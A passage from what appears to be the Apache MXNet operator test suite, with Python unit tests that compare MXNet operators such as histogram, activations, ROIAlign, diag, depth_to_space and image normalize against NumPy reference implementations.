return np.histogram(x, bins, range=range)
for ndim in range(1, 6):
shape = rand_shape_nd(ndim)
x = rand_ndarray(shape, stype='default', dtype=np.float64)
mx_bins = mx.nd.array([-1.0, 0.5, 2.0, 4.5, 50.0], dtype=np.float64)
np_bins = mx_bins.asnumpy()
bin_cnt = random.randint(2, 10)
bin_range = (-2.5, 2.5)
mx_histo1, mx_bins1 = mx.nd.histogram(x, bins=bin_cnt, range=bin_range)
np_histo1, np_bins1 = f(x.asnumpy(), bins=bin_cnt, range=bin_range)
assert_almost_equal(mx_bins1, np_bins1)
assert_almost_equal(mx_histo1, np_histo1, rtol=1e-3, atol=1e-5)
mx_histo2, mx_bins2 = mx.nd.histogram(x, bins=mx_bins)
np_histo2, np_bins2 = f(x.asnumpy(), bins=np_bins)
assert_almost_equal(mx_histo2, np_histo2, rtol=1e-3, atol=1e-5)
assert_almost_equal(mx_bins2, np_bins2, rtol=1e-3, atol=1e-5)
data = mx.sym.Variable("data")
bins = mx.sym.Variable("bins")
histo1 = mx.sym.histogram(a=data, bins=bin_cnt, range=bin_range)
histo2 = mx.sym.histogram(a=data, bins=bins)
executor1 = histo1._bind(ctx=default_context(), args={"data" : x})
executor1.forward(is_train=False)
assert_almost_equal(np_histo1, executor1.outputs[0].asnumpy(), 0, 0, ("EXPECTED_histo1", "FORWARD_histo1"), equal_nan=False)
executor2 = histo2._bind(ctx=default_context(), args={"data" : x, "bins" : mx_bins})
executor2.forward(is_train=False)
assert_almost_equal(np_histo2, executor2.outputs[0].asnumpy(), 0, 0, ("EXPECTED_histo2", "FORWARD_histo2"), equal_nan=False)
@pytest.mark.skip(reason="test fails intermittently. temporarily disabled till it gets fixed. tracked at https://github.com/apache/incubator-mxnet/issues/13915")
def test_activation():
shapes = [(9,), (9, 10), (9, 10, 10), (1, 9, 10, 10)]
dtype_l = [np.float64, np.float32, np.float16]
rtol_l = [1e-7, 1e-6, 1e-2]
atol_l = [1e-7, 1e-6, 1e-2]
rtol_fd = 1e-5
atol_fd = 1e-6
num_eps = 1e-6
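    # Each entry: [mxnet symbol builder, numpy forward fn, numpy gradient fn, test range low, test range high]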
unary_ops = {
'relu': [lambda x: mx.sym.Activation(x, act_type='relu'),
lambda x: np.maximum(x, 0.),
lambda x: 1. * (x > 0.),
-5.0, 5.0],
'sigmoid': [lambda x: mx.sym.Activation(x, act_type='sigmoid'),
lambda x: 1. / (np.exp(-x) + 1.),
lambda x: 1. / (np.exp(-x) + 1.) / (np.exp(x) + 1.),
-3.0, 3.0],
'tanh': [lambda x: mx.sym.Activation(x, act_type='tanh'),
lambda x: np.tanh(x),
lambda x: 1. - np.tanh(x) ** 2,
-4.0, 4.0],
'softrelu': [lambda x: mx.sym.Activation(x, act_type='softrelu'),
lambda x: np.log(1. + np.exp(x)),
lambda x: 1. - 1 / (1 + np.exp(x)),
-3.0, 3.0],
'softsign': [lambda x: mx.sym.Activation(x, act_type='softsign'),
lambda x: x / (1. + np.abs(x)),
lambda x: 1. / np.square(1. + np.abs(x)),
-3.0, 3.0],
}
# Loop over operators
for name, op in unary_ops.items():
# Loop over shapes
for shape in shapes:
# Loop over dtype's
for ind in range(len(dtype_l)):
dtype = dtype_l[ind]
rtol = rtol_l[ind]
atol = atol_l[ind]
compare_forw_backw_unary_op(
name, op[0], op[1], op[2], shape, op[3], op[4], rtol, atol,
dtype)
# Finite difference testing
finite_diff_unary_op(
name, op[0], shape, op[3], op[4], rtol_fd, atol_fd, num_eps)
@pytest.mark.serial
def test_ravel():
# be aware that check_symbolic_forward will use float type internally
# for the arrays and that limits the representable flat index range.
# Taking dim==4 and a range of [0,..,100] for the data can already
# cause precision issues and break this test.
for dim in [1, 2, 3, 4]:
data = np.random.randint(50, size=(dim, 500))
shape = tuple(np.add(np.amax(data, axis=1), [1]))
a = mx.sym.Variable('a')
ravel_npy = np.ravel_multi_index(data, shape)
b = mx.sym.ravel_multi_index(a, shape=shape)
check_symbolic_forward(b, location={'a': data}, expected=[ravel_npy])
c = mx.sym.unravel_index(a, shape=shape)
check_symbolic_forward(c, location={'a': ravel_npy}, expected=[data])
# Test with leading dimension set to -1.
        shape2 = (-1,) + shape[1:]
b = mx.sym.ravel_multi_index(a, shape=shape2)
check_symbolic_forward(b, location={'a': data}, expected=[ravel_npy])
c = mx.sym.unravel_index(a, shape=shape2)
check_symbolic_forward(c, location={'a': ravel_npy}, expected=[data])
def test_unravel_index():
unravel_shape = (2, 10)
unravel_size = np.prod(unravel_shape)
for shape in [(10,), (2, 10), (3, 4, 5)]:
a = np.random.randint(0, unravel_size, size=shape)
b = np.stack(np.unravel_index(a, shape=unravel_shape), 0)
a_mx = mx.nd.array(a)
b_mx = mx.nd.unravel_index(a_mx, shape=unravel_shape)
assert_array_equal(b, b_mx.asnumpy())
def test_context_num_gpus():
try:
        # Note: this test runs on both GPU and CPU hosts, so we cannot assert a specific GPU count here.
assert mx.context.num_gpus() >= 0
except mx.MXNetError as e:
        # Note: on a CPU-only host, CUDA sometimes cannot determine the number of GPUs.
if str(e).find("CUDA") == -1:
raise e
@pytest.mark.serial
def test_op_roi_align():
T = np.float32
def assert_same_dtype(dtype_a, dtype_b):
'''
        Assert that the two data types are the same
Parameters
----------
dtype_a, dtype_b: type
Input data types to compare
'''
assert dtype_a == dtype_b,\
TypeError('Unmatched data types: %s vs %s' % (dtype_a, dtype_b))
def bilinear_interpolate(bottom, height, width, y, x):
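        # Returns the bilinearly interpolated value at (y, x) together with a list of
        # (y_index, x_index, weight) triples, which the caller uses to accumulate the
        # gradient w.r.t. the input feature map.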
if y < -1.0 or y > height or x < -1.0 or x > width:
return T(0.0), []
x = T(max(0.0, x))
y = T(max(0.0, y))
x_low = int(x)
y_low = int(y)
if x_low >= width - 1:
x_low = x_high = width - 1
x = T(x_low)
else:
x_high = x_low + 1
if y_low >= height - 1:
y_low = y_high = height - 1
y = T(y_low)
else:
y_high = y_low + 1
ly = y - T(y_low)
lx = x - T(x_low)
hy = T(1.0) - ly
hx = T(1.0) - lx
v1 = bottom[y_low, x_low]
v2 = bottom[y_low, x_high]
v3 = bottom[y_high, x_low]
v4 = bottom[y_high, x_high]
w1 = hy * hx
w2 = hy * lx
w3 = ly * hx
w4 = ly * lx
assert_same_dtype(w1.dtype, T)
assert_same_dtype(w2.dtype, T)
assert_same_dtype(w3.dtype, T)
assert_same_dtype(w4.dtype, T)
val = w1 * v1 + w2 * v2 + w3 * v3 + w4 * v4
assert_same_dtype(val.dtype, T)
grad = [(y_low, x_low, w1), (y_low, x_high, w2),
(y_high, x_low, w3), (y_high, x_high, w4)
]
return val, grad
def roialign_forward_backward(data, rois, pooled_size, spatial_scale, sampling_ratio,
position_sensitive, dy):
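        # NumPy reference for ROIAlign: computes the pooled output and the gradient w.r.t.
        # the input data (dx); the gradient w.r.t. rois stays zero. Supports both the plain
        # and the position-sensitive variants.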
N, C, H, W = data.shape
R = rois.shape[0]
PH, PW = pooled_size
assert rois.ndim == 2,\
ValueError(
'The ndim of rois should be 2 rather than %d' % rois.ndim)
assert rois.shape[1] == 5,\
ValueError(
'The length of the axis 1 of rois should be 5 rather than %d' % rois.shape[1])
assert_same_dtype(data.dtype, T)
assert_same_dtype(rois.dtype, T)
C_out = C // PH // PW if position_sensitive else C
out = np.zeros((R, C_out, PH, PW), dtype=T)
dx = np.zeros_like(data)
drois = np.zeros_like(rois)
for r in range(R):
batch_ind = int(rois[r, 0])
sw, sh, ew, eh = rois[r, 1:5] * T(spatial_scale)
roi_w = T(max(ew - sw, 1.0))
roi_h = T(max(eh - sh, 1.0))
bin_h = roi_h / T(PH)
bin_w = roi_w / T(PW)
bdata = data[batch_ind]
if sampling_ratio > 0:
roi_bin_grid_h = roi_bin_grid_w = sampling_ratio
else:
roi_bin_grid_h = int(np.ceil(roi_h / T(PH)))
roi_bin_grid_w = int(np.ceil(roi_w / T(PW)))
count = T(roi_bin_grid_h * roi_bin_grid_w)
for c in range(C_out):
for ph in range(PH):
for pw in range(PW):
val = T(0.0)
c_in = c * PH * PW + ph * PW + pw if position_sensitive else c
for iy in range(roi_bin_grid_h):
y = sh + T(ph) * bin_h + (T(iy) + T(0.5)) * \
bin_h / T(roi_bin_grid_h)
for ix in range(roi_bin_grid_w):
x = sw + T(pw) * bin_w + (T(ix) + T(0.5)) * \
bin_w / T(roi_bin_grid_w)
v, g = bilinear_interpolate(
bdata[c_in], H, W, y, x)
assert_same_dtype(v.dtype, T)
val += v
# compute grad
for qy, qx, qw in g:
assert_same_dtype(qw.dtype, T)
dx[batch_ind, c_in, qy, qx] += dy[r,
c, ph, pw] * qw / count
out[r, c, ph, pw] = val / count
assert_same_dtype(out.dtype, T)
return out, [dx, drois]
def test_roi_align_value(sampling_ratio=0, position_sensitive=False):
ctx = default_context()
dtype = np.float32
dlen = 224
N, C, H, W = 5, 3, 16, 16
R = 7
pooled_size = (3, 4)
C = C * pooled_size[0] * pooled_size[1] if position_sensitive else C
spatial_scale = H * 1.0 / dlen
data = mx.nd.array(
np.arange(N * C * W * H).reshape((N, C, H, W)), ctx=ctx, dtype=dtype)
center_xy = mx.nd.random.uniform(0, dlen, (R, 2), ctx=ctx, dtype=dtype)
wh = mx.nd.random.uniform(0, dlen, (R, 2), ctx=ctx, dtype=dtype)
batch_ind = mx.nd.array(np.random.randint(0, N, size=(R, 1)), ctx=ctx)
pos = mx.nd.concat(center_xy - wh / 2, center_xy + wh / 2, dim=1)
rois = mx.nd.concat(batch_ind, pos, dim=1)
data.attach_grad()
rois.attach_grad()
with mx.autograd.record():
output = mx.nd.contrib.ROIAlign(data, rois, pooled_size=pooled_size,
spatial_scale=spatial_scale, sample_ratio=sampling_ratio,
position_sensitive=position_sensitive)
C_out = C // pooled_size[0] // pooled_size[1] if position_sensitive else C
dy = mx.nd.random.uniform(-1, 1, (R, C_out) +
pooled_size, ctx=ctx, dtype=dtype)
output.backward(dy)
real_output, [dx, drois] = roialign_forward_backward(data.asnumpy(), rois.asnumpy(), pooled_size,
spatial_scale, sampling_ratio,
position_sensitive, dy.asnumpy())
assert_almost_equal(output, real_output, atol=1e-3)
assert_almost_equal(data.grad, dx, atol=1e-3)
assert_almost_equal(rois.grad, drois, atol=1e-3)
# modified from test_roipooling()
def test_roi_align_autograd(sampling_ratio=0):
ctx = default_context()
data = mx.symbol.Variable(name='data')
rois = mx.symbol.Variable(name='rois')
test = mx.symbol.contrib.ROIAlign(data=data, rois=rois, pooled_size=(4, 4), spatial_scale=1,
sample_ratio=sampling_ratio)
x1 = np.random.rand(4, 1, 12, 12).astype('float64')
x2 = np.array([[0, 1.1, 1.1, 6.2, 6.2], [2, 6.1, 2.1, 8.2, 11.2],
[1, 3.1, 1.1, 5.2, 10.2]], dtype='float64')
check_numeric_gradient(sym=test, location=[x1, x2],
grad_nodes={'data': 'write', 'rois': 'null'},
numeric_eps=1e-4, rtol=1e-1, atol=1e-4, ctx=ctx)
check_numeric_gradient(sym=test, location=[x1, x2],
grad_nodes={'data': 'add', 'rois': 'null'},
numeric_eps=1e-4, rtol=1e-1, atol=1e-4, ctx=ctx)
test_roi_align_value()
test_roi_align_value(sampling_ratio=2)
test_roi_align_value(position_sensitive=True)
test_roi_align_autograd()
def test_op_rroi_align():
T = np.float32
def assert_same_dtype(dtype_a, dtype_b):
'''
        Assert that the two data types are the same
Parameters
----------
dtype_a, dtype_b: type
Input data types to compare
'''
assert dtype_a == dtype_b,\
TypeError('Unmatched data types: %s vs %s' % (dtype_a, dtype_b))
def bilinear_interpolate(bottom, height, width, y, x):
if y < -1.0 or y > height or x < -1.0 or x > width:
return T(0.0)
x = T(max(0.0, x))
y = T(max(0.0, y))
x_low = int(x)
y_low = int(y)
if x_low >= width - 1:
x_low = x_high = width - 1
x = T(x_low)
else:
x_high = x_low + 1
if y_low >= height - 1:
y_low = y_high = height - 1
y = T(y_low)
else:
y_high = y_low + 1
ly = y - T(y_low)
lx = x - T(x_low)
hy = T(1.0) - ly
hx = T(1.0) - lx
v1 = bottom[y_low, x_low]
v2 = bottom[y_low, x_high]
v3 = bottom[y_high, x_low]
v4 = bottom[y_high, x_high]
w1 = hy * hx
w2 = hy * lx
w3 = ly * hx
w4 = ly * lx
assert_same_dtype(w1.dtype, T)
assert_same_dtype(w2.dtype, T)
assert_same_dtype(w3.dtype, T)
assert_same_dtype(w4.dtype, T)
val = w1 * v1 + w2 * v2 + w3 * v3 + w4 * v4
assert_same_dtype(val.dtype, T)
return val
def rroialign_forward(data, rois, pooled_size, spatial_scale, sampling_ratio):
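        # NumPy reference for rotated ROIAlign: each roi is (batch_idx, center_x, center_y, w, h,
        # angle_in_degrees); sampling points are laid out in the box's local frame and rotated
        # by the angle before bilinear interpolation.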
N, C, H, W = data.shape
R = rois.shape[0]
PH, PW = pooled_size
assert rois.ndim == 2,\
ValueError(
'The ndim of rois should be 2 rather than %d' % rois.ndim)
assert rois.shape[1] == 6,\
ValueError(
'The length of the axis 1 of rois should be 6 rather than %d' % rois.shape[1])
assert_same_dtype(data.dtype, T)
assert_same_dtype(rois.dtype, T)
out = np.zeros((R, C, PH, PW), dtype=T)
for r in range(R):
batch_ind = int(rois[r, 0])
roi_center_w, roi_center_h, roi_w, roi_h = rois[r, 1:5] * T(spatial_scale)
roi_theta = T(rois[r,5] * np.pi / 180.0)
roi_w = T(max(roi_w, 1.0))
roi_h = T(max(roi_h, 1.0))
bin_h = roi_h / T(PH)
bin_w = roi_w / T(PW)
bdata = data[batch_ind]
if sampling_ratio > 0:
roi_bin_grid_h = roi_bin_grid_w = sampling_ratio
else:
roi_bin_grid_h = int(np.ceil(roi_h / T(PH)))
roi_bin_grid_w = int(np.ceil(roi_w / T(PW)))
count = T(roi_bin_grid_h * roi_bin_grid_w)
roi_start_h = T(-roi_h / 2.0)
roi_start_w = T(-roi_w / 2.0)
for c in range(C):
for ph in range(PH):
for pw in range(PW):
val = T(0.0)
for iy in range(roi_bin_grid_h):
yy = roi_start_h + T(ph) * bin_h + (T(iy) + T(0.5)) * \
bin_h / T(roi_bin_grid_h)
for ix in range(roi_bin_grid_w):
xx = roi_start_w + T(pw) * bin_w + (T(ix) + T(0.5)) * \
bin_w / T(roi_bin_grid_w)
x = xx * np.cos(roi_theta, dtype=T) + yy * np.sin(roi_theta, dtype=T) + roi_center_w
y = yy * np.cos(roi_theta, dtype=T) - xx * np.sin(roi_theta, dtype=T) + roi_center_h
v = bilinear_interpolate(
bdata[c], H, W, y, x)
assert_same_dtype(v.dtype, T)
val += v
out[r, c, ph, pw] = val / count
assert_same_dtype(out.dtype, T)
return out
def test_rroi_align_value(sampling_ratio=-1):
ctx = default_context()
if ctx.device_type == 'gpu':
print('skipped testing rroi align for gpu since it is not supported yet')
return
dtype = np.float32
dlen = 224
N, C, H, W = 5, 3, 16, 16
R = 7
pooled_size = (3, 4)
spatial_scale = H * 1.0 / dlen
data = mx.nd.array(
np.arange(N * C * W * H).reshape((N, C, H, W)), ctx=ctx, dtype=dtype)
center_xy = mx.nd.random.uniform(0, dlen, (R, 2), ctx=ctx, dtype=dtype)
wh = mx.nd.random.uniform(0, dlen, (R, 2), ctx=ctx, dtype=dtype)
theta = mx.nd.random.uniform(0, 180, (R,1), ctx=ctx, dtype=dtype)
batch_ind = mx.nd.array(np.random.randint(0, N, size=(R, 1)), ctx=ctx)
pos = mx.nd.concat(center_xy, wh, theta, dim=1)
rois = mx.nd.concat(batch_ind, pos, dim=1)
output = mx.nd.contrib.RROIAlign(data, rois, pooled_size=pooled_size,
spatial_scale=spatial_scale, sampling_ratio=sampling_ratio)
real_output = rroialign_forward(data.asnumpy(), rois.asnumpy(), pooled_size,
spatial_scale, sampling_ratio)
assert_almost_equal(output.asnumpy(), real_output, atol=1e-3)
test_rroi_align_value()
test_rroi_align_value(sampling_ratio=2)
def test_diag():
# Test 2d input
h = np.random.randint(2,9)
w = np.random.randint(2,9)
a_np = np.random.random((h, w)).astype(np.float32)
a = mx.nd.array(a_np).astype('float32')
for k in [0, 1, -1, np.random.randint(-min(h,w) + 1, min(h,w))]:
assert_almost_equal(mx.nd.diag(a, k=k), np.diag(a_np, k=k))
# invalid k
k = max(h,w) + 1
assertRaises(MXNetError, mx.nd.diag, a, k=k)
# Test 2d backward, k=0
data = mx.sym.Variable('data')
diag_sym = mx.sym.diag(data=data)
check_numeric_gradient(diag_sym, [a_np])
# Test 2d backward, k=1
data = mx.sym.Variable('data')
diag_sym = mx.sym.diag(data=data, k=1)
check_numeric_gradient(diag_sym, [a_np])
# Test 2d backward, k=-1
data = mx.sym.Variable('data')
diag_sym = mx.sym.diag(data=data, k=-1)
check_numeric_gradient(diag_sym, [a_np])
# test 1d input
d = np.random.randint(2,9)
a_np = np.random.random((d))
a = mx.nd.array(a_np)
# k is random
k = np.random.randint(-d,d)
assert_almost_equal(mx.nd.diag(a, k=k), np.diag(a_np, k=k))
    # Test 1d backward, k=0
data = mx.sym.Variable('data')
diag_sym = mx.sym.diag(data=data)
check_numeric_gradient(diag_sym, [a_np])
    # Test 1d backward, k=1
data = mx.sym.Variable('data')
diag_sym = mx.sym.diag(data=data, k=1)
check_numeric_gradient(diag_sym, [a_np])
    # Test 1d backward, k=-1
data = mx.sym.Variable('data')
diag_sym = mx.sym.diag(data=data, k=-1)
check_numeric_gradient(diag_sym, [a_np])
# Test 4d input
x1 = np.random.randint(3,9)
x2 = np.random.randint(3,9)
x3 = np.random.randint(3,9)
x4 = np.random.randint(3,9)
a_np = np.random.random((x1, x2, x3, x4)).astype(np.float32)
a = mx.nd.array(a_np).astype('float32')
# k = 0, axis1=0, axis2=1
r = mx.nd.diag(data=a, k=0, axis1=0, axis2=1)
assert_almost_equal(r, np.diagonal(a_np, offset=0, axis1=0, axis2=1))
# k = 1, axis1=1, axis2=0
r = mx.nd.diag(data=a, k=1, axis1=1, axis2=0)
assert_almost_equal(r, np.diagonal(a_np, offset=1, axis1=1, axis2=0))
    # k = -1, axis1=1, axis2=3
r = mx.nd.diag(data=a, k=-1, axis1=1, axis2=3)
assert_almost_equal(r, np.diagonal(a_np, offset=-1, axis1=1, axis2=3))
# k = 2, axis1=-2, axis2=0
r = mx.nd.diag(data=a, k=2, axis1=-2, axis2=0)
assert_almost_equal(r, np.diagonal(a_np, offset=2, axis1=-2, axis2=0))
# Test 4d backward, k=0, axis1=3, axis2=0
data = mx.sym.Variable('data')
diag_sym = mx.sym.diag(data=data, k=0, axis1=3, axis2=0)
check_numeric_gradient(diag_sym, [a_np])
# Test 4d backward, k=1, axis1=1, axis2=2
data = mx.sym.Variable('data')
diag_sym = mx.sym.diag(data=data, k=1, axis1=1, axis2=2)
check_numeric_gradient(diag_sym, [a_np])
# Test 4d backward, k=-1, axis1=2, axis2=0
data = mx.sym.Variable('data')
diag_sym = mx.sym.diag(data=data, k=-1, axis1=2, axis2=0)
check_numeric_gradient(diag_sym, [a_np])
# Test 4d backward, k=-2, axis1=1, axis2=-1
data = mx.sym.Variable('data')
diag_sym = mx.sym.diag(data=data, k=-2, axis1=1, axis2=-1)
check_numeric_gradient(diag_sym, [a_np])
@pytest.mark.serial
def test_depthtospace():
def f(x, blocksize):
b, c, h, w = x.shape[0], x.shape[1], x.shape[2], x.shape[3]
tmp = np.reshape(x, [b, blocksize, blocksize, c // (blocksize**2), h, w])
tmp = np.transpose(tmp, [0, 3, 4, 1, 5, 2])
y = np.reshape(tmp, [b, c // (blocksize**2), h * blocksize, w * blocksize])
return y
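    # Worked example of the reference above: for blocksize 2, an input of shape (1, 4, 1, 1)
    # with channel values [v0, v1, v2, v3] maps to shape (1, 1, 2, 2) laid out as
    # [[v0, v1], [v2, v3]].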
block = random.randint(2, 4)
rand_mul1 = random.randint(1, 4)
n = random.randint(1, 5)
c = block * block * rand_mul1
h = random.randint(1, 5)
w = random.randint(1, 5)
shape_inp = (n, c, h, w)
data = rand_ndarray(shape_inp, 'default')
data_np = data.asnumpy()
expected = f(data_np, block)
output = mx.nd.depth_to_space(data, block)
assert_almost_equal(output, expected, atol=1e-3, rtol=1e-3)
shape_out = (n, c // (block ** 2), h * block, w * block)
data = mx.sym.Variable('data')
dts_sym = mx.sym.depth_to_space(data, block)
check_numeric_gradient(dts_sym, [np.ones(shape_inp)])
check_symbolic_forward(dts_sym, [data_np], [expected])
check_symbolic_backward(dts_sym, [data_np], [np.ones(shape_out)], [np.ones(shape_inp)])
def test_invalid_depth_dim():
invalid_shape_inp = (n, block - 1, h, w)
data = rand_ndarray(invalid_shape_inp, 'default')
assertRaises(MXNetError, mx.nd.depth_to_space, data, block)
def test_invalid_space_dim():
invalid_shape_inp = (n, block ** 2, 0, block + 1)
data = rand_ndarray(invalid_shape_inp, 'default')
assertRaises(MXNetError, mx.nd.depth_to_space, data, block)
def test_invalid_block_size():
block = 0
invalid_shape_inp = (n , c, h, w)
data = rand_ndarray(invalid_shape_inp, 'default')
assertRaises(MXNetError, mx.nd.depth_to_space, data, block)
test_invalid_depth_dim()
test_invalid_space_dim()
test_invalid_block_size()
@pytest.mark.serial
def test_spacetodepth():
def f(x, blocksize):
b, c, h, w = x.shape[0], x.shape[1], x.shape[2], x.shape[3]
tmp = np.reshape(x, [b, c, h // blocksize, blocksize, w // blocksize, blocksize])
tmp = np.transpose(tmp, [0, 3, 5, 1, 2, 4])
y = np.reshape(tmp, [b, c * (blocksize**2), h // blocksize, w // blocksize])
return y
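    # Worked example of the reference above: for blocksize 2, a (1, 1, 2, 2) input
    # [[v0, v1], [v2, v3]] maps to shape (1, 4, 1, 1) with channels [v0, v1, v2, v3],
    # i.e. the inverse of the depth_to_space mapping.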
block = random.randint(2, 4)
rand_mul1 = random.randint(1, 4)
rand_mul2 = random.randint(1, 4)
n = random.randint(1, 5)
c = random.randint(1, 5)
h = block * rand_mul1
w = block * rand_mul2
shape_inp = (n, c, h, w)
data = rand_ndarray(shape_inp, 'default')
data_np = data.asnumpy()
expected = f(data_np, block)
output = mx.nd.space_to_depth(data, block)
assert_almost_equal(output, expected, atol=1e-3, rtol=1e-3)
shape_out = (n, c * (block ** 2), h // block, w // block)
data = mx.sym.Variable('data')
dts_sym = mx.sym.space_to_depth(data, block)
check_numeric_gradient(dts_sym, [np.ones(shape_inp)])
check_symbolic_forward(dts_sym, [data_np], [expected])
check_symbolic_backward(dts_sym, [data_np], [np.ones(shape_out)], [np.ones(shape_inp)])
def test_invalid_space_dim():
invalid_shape_inp = (n , c, block - 1, w)
data = rand_ndarray(invalid_shape_inp, 'default')
assertRaises(MXNetError, mx.nd.space_to_depth, data, block)
def test_invalid_block_size():
block = 0
invalid_shape_inp = (n, c, h, w)
data = rand_ndarray(invalid_shape_inp, 'default')
assertRaises(MXNetError, mx.nd.space_to_depth, data, block)
def test_invalid_depth_dim():
invalid_shape_inp = (n, 0, h, w)
data = rand_ndarray(invalid_shape_inp, 'default')
assertRaises(MXNetError, mx.nd.space_to_depth, data, block)
test_invalid_space_dim()
test_invalid_block_size()
test_invalid_depth_dim()
def test_softmax_cross_entropy():
def f_sm_ce(data, label):
return np.sum(-np.log(data) * label)
data = mx.sym.Variable('data')
label = mx.sym.Variable('label')
sym = mx.sym.softmax_cross_entropy(data=data, label=label)
num_labels = random.randint(100, 200)
batch_size = random.randint(100, 200)
np_data = rand_ndarray((batch_size, num_labels), stype='default').asnumpy()
np_sm = np_softmax(np_data)
np_label = np.random.randint(0, num_labels, (batch_size, ))
np_one_hot_label = np.zeros((batch_size, num_labels))
np_one_hot_label[np.arange(batch_size), np_label] = 1.
check_symbolic_forward(sym, {'data' : np_data, 'label' : np_label}, [np.array([f_sm_ce(np_sm, np_one_hot_label)])], rtol=1e-3, atol=1e-5)
def test_split_v2():
dim = random.randint(2, 6)
shape = rand_shape_nd(dim)
axis = random.randint(-dim, dim-1)
axis_size = shape[axis]
samples = random.randint(0, axis_size - 1)
indices = sorted(random.sample([i for i in range(1, axis_size)], samples))
indices = tuple(indices)
mx_data = rand_ndarray(shape)
np_data = mx_data.asnumpy()
np_out = np.split(np_data, indices_or_sections=indices, axis=axis)
data = mx.sym.Variable("data")
sym = mx.sym.split_v2(data, indices_or_sections=indices, axis=axis)
check_symbolic_forward(sym, {"data": mx_data}, np_out, rtol=1e-3, atol=1e-5)
out_grad = [np.ones(arr.shape) for arr in np_out]
check_symbolic_backward(sym, {"data": mx_data}, out_grad, [np.concatenate(out_grad, axis=axis)])
def test_moments():
dim = random.randint(2, 5)
shape = rand_shape_nd(dim, dim=5)
axes = [i for i in range(dim)]
test_dims = random.sample(axes, random.randint(1, dim))
test_axes = tuple(sorted(test_dims))
np_a = np.random.uniform(-1.0, 1.0, shape)
a = mx.nd.array(np_a)
for keepdims in [True, False]:
eps = 1e-3
np_a[abs(np_a) < eps] = 2 * eps
np_mean = np.mean(np_a, axis=test_axes, keepdims=keepdims)
np_var = np.var(np_a, axis=test_axes, keepdims=keepdims)
mx_mean, mx_var = mx.nd.moments(a, keepdims=keepdims, axes=test_axes)
N = np_a.size / np_mean.size
mx_sym = mx.sym.Variable("data")
mx_moments = mx.sym.moments(mx_sym, axes=test_axes, keepdims=keepdims)
mx_test_sym = mx.sym.elemwise_add(mx_moments[0], mx_moments[1])
if len(np_mean.shape) == 0:
np_mean = np_mean.reshape(mx_mean.shape)
np_var = np_var.reshape(mx_var.shape)
assert np_mean.shape == mx_mean.shape
assert np_var.shape == mx_var.shape
check_symbolic_forward(mx_test_sym, [np_a], [np_mean + np_var], rtol=1e-3, atol=1e-5)
check_numeric_gradient(mx_test_sym, [np_a], numeric_eps=eps, rtol=1e-2, atol=2e-4)
def test_invalid_kernel_size():
invalid_kernel_size = 28
assert_exception(
mx.nd.Correlation,
MXNetError,
mx.nd.array(np.random.rand(1, 1, 28, 28)),
mx.nd.array(np.random.rand(1, 1, 28, 28)),
kernel_size=invalid_kernel_size)
def test_valid_kernel_size():
valid_kernel_size = 9
mx.nd.Correlation(
mx.nd.array(np.random.rand(1, 1, 28, 28)),
mx.nd.array(np.random.rand(1, 1, 28, 28)),
kernel_size=valid_kernel_size)
def test_valid_max_pooling_pad_type_same():
import math
input_data = mx.nd.array(np.random.rand(1,1,10))
stride = 2
kernel = 2
output_data=mx.nd.Pooling(
input_data,
kernel=kernel,
stride=stride,
pad=(0,0,0),
pool_type='max',
name='pooling',
pooling_convention="same")
assert(math.ceil(input_data.shape[2]/stride) == output_data.shape[2])
def test_invalid_max_pooling_pad_type_same():
import math
input_data = mx.nd.array(np.random.rand(1,1,10))
stride = 2
kernel = 2
pad = 2
assert_exception(
mx.nd.Pooling,
MXNetError,
input_data,
stride=stride,
kernel=kernel,
pad=pad,
pool_type='max',
name='pooling',
pooling_convention="same")
@pytest.mark.serial
def test_image_normalize():
# Part 1 - Test 3D input with 3D mean/std
shape_3d = (3, 28, 28)
mean = (0, 1, 2)
std = (3, 2, 1)
data_in_3d = mx.nd.random.uniform(0, 1, shape_3d)
data_expected_3d = data_in_3d.asnumpy()
    data_expected_3d[0, :, :] = data_expected_3d[0, :, :] / 3.0
    data_expected_3d[1, :, :] = (data_expected_3d[1, :, :] - 1.0) / 2.0
    data_expected_3d[2, :, :] = data_expected_3d[2, :, :] - 2.0
data = mx.symbol.Variable('data')
img_norm_sym = mx.sym.image.normalize(data=data, mean=mean, std=std)
# check forward
check_symbolic_forward(img_norm_sym, [data_in_3d], [data_expected_3d],
rtol=1e-5, atol=1e-5)
# Gradient is 1/std_dev
grad_expected_3d = np.ones(shape_3d)
    grad_expected_3d[0, :, :] = 1 / 3.0
    grad_expected_3d[1, :, :] = 1 / 2.0
    grad_expected_3d[2, :, :] = 1 / 1.0
# check backward
check_symbolic_backward(img_norm_sym, location=[data_in_3d], out_grads=[mx.nd.ones(shape_3d)],
expected=[grad_expected_3d], rtol=1e-5, atol=1e-5)
# check backward using finite difference
check_numeric_gradient(img_norm_sym, [data_in_3d], atol=0.001)
# Part 2 - Test 4D input with 3D mean/std
shape_4d = (2, 3, 28, 28)
data_in_4d = mx.nd.random.uniform(0, 1, shape_4d)
data_expected_4d = data_in_4d.asnumpy()
    data_expected_4d[0, 0, :, :] = data_expected_4d[0, 0, :, :] / 3.0
    data_expected_4d[0, 1, :, :] = (data_expected_4d[0, 1, :, :] - 1.0) / 2.0
    data_expected_4d[0, 2, :, :] = data_expected_4d[0, 2, :, :] - 2.0
    data_expected_4d[1, 0, :, :] = data_expected_4d[1, 0, :, :] / 3.0
    data_expected_4d[1, 1, :, :] = (data_expected_4d[1, 1, :, :] - 1.0) / 2.0
    data_expected_4d[1, 2, :, :] = data_expected_4d[1, 2, :, :] - 2.0
# check forward
check_symbolic_forward(img_norm_sym, [data_in_4d], [data_expected_4d],
rtol=1e-5, atol=1e-5)
# Gradient is 1/std_dev
grad_expected_4d = np.ones(shape_4d)
    grad_expected_4d[0, 0, :, :] = 1 / 3.0
    grad_expected_4d[0, 1, :, :] = 1 / 2.0
    grad_expected_4d[0, 2, :, :] = 1 / 1.0
    grad_expected_4d[1, 0, :, :] = 1 / 3.0
    grad_expected_4d[1, 1, :, :] = 1 / 2.0
    grad_expected_4d[1, 2, :, :] = 1 / 1.0
# check backward
check_symbolic_backward(img_norm_sym, location=[data_in_4d], out_grads=[mx.nd.ones(shape_4d)],
expected=[grad_expected_4d], rtol=1e-5, atol=1e-5)
# check backward using finite difference
check_numeric_gradient(img_norm_sym, [data_in_4d], atol=0.001)
# Part 3 - Test 3D input with scalar mean/std
shape_3d = (3, 28, 28)
mean = 1.0
std = 2.0
data_in_3d = mx.nd.random.uniform(0, 1, shape_3d)
data_expected_3d = data_in_3d.asnumpy()
data_expected_3d[:][:][:] = (data_expected_3d[:][:][:] - 1.0) / 2.0
data = mx.symbol.Variable('data')
img_norm_sym = mx.sym.image.normalize(data=data, mean=mean, std=std)
# check forward
